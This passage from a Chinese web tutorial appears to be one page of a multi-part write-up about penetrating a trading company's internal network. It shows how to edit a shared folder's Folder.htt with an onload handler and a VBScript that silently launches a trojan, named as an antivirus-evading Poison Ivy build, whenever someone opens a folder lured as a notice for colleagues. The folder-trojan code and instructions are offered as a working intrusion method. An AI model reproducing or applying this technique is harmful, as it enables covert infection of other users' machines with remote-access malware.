WEB开发网
开发学院网络安全安全技术 对某贸易公司内网的一次安全检测 阅读

对某贸易公司内网的一次安全检测

 2008-12-19 13:40:48 来源:WEB开发网   
核心提示: 图14 查看隐藏的文件夹 点击进去后,里面有一个Folder.htt的文件,对某贸易公司内网的一次安全检测(6),这个就是我们要添加我们脚本的地方了,用UE或者notepad.exe打开Folder.htt,这种攻击方式在我们内网渗透上可以起到一定的效果,当对方只共享部分文件夹的时候我们就

图14 查看隐藏的文件夹

点击进去后,里面有一个Folder.htt的文件,这个就是我们要添加我们脚本的地方了,用UE或者notepad.exe打开Folder.htt,如图15所示。

对某贸易公司内网的一次安全检测

图15 Folder Settings文件夹中的详细文件

我们在其中添加我们的脚本代码:

在Folder.htt文件前面加:

{BODY onload="vbscript :load()}

注:{ }实为“< >”

对某贸易公司内网的一次安全检测

图16 在Fold中添加启动代码

在尾部加vbs代码,如图17所示:

对某贸易公司内网的一次安全检测

图17

图17 在 尾部添加启动木马的vbs脚本

{script language=vbscript}
function load()
set wsh=CreateObject("WScript.Shell")
wsh.run "d:updateupdate.exe",0
end function
{/script}
注:代码中的{ }实为“< >”

保存后,将我们配置好的木马放置共享文件夹下的update文件中,这里我使用的木马是Poison2.31免杀版。这样我们就完成了这个文件夹木马的制作,当你打开“同仁请看”这个文件夹的时候,你就同时调用了我们放在其中的脚本,从而启动了我们的木马。

这种攻击方式在我们内网渗透上可以起到一定的效果,当对方只共享部分文件夹的时候我们就可以在其中添加一些代码,从而达到内网渗透的效果。当然前提必须对方的操作系统是比较久远的版本,例如:Windows 2000 professor、Windows 2000 server以及部分早期的Windows Xp。

上一页  1 2 3 4 5 6 7  下一页

Tags:贸易公司 一次 安全检测

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接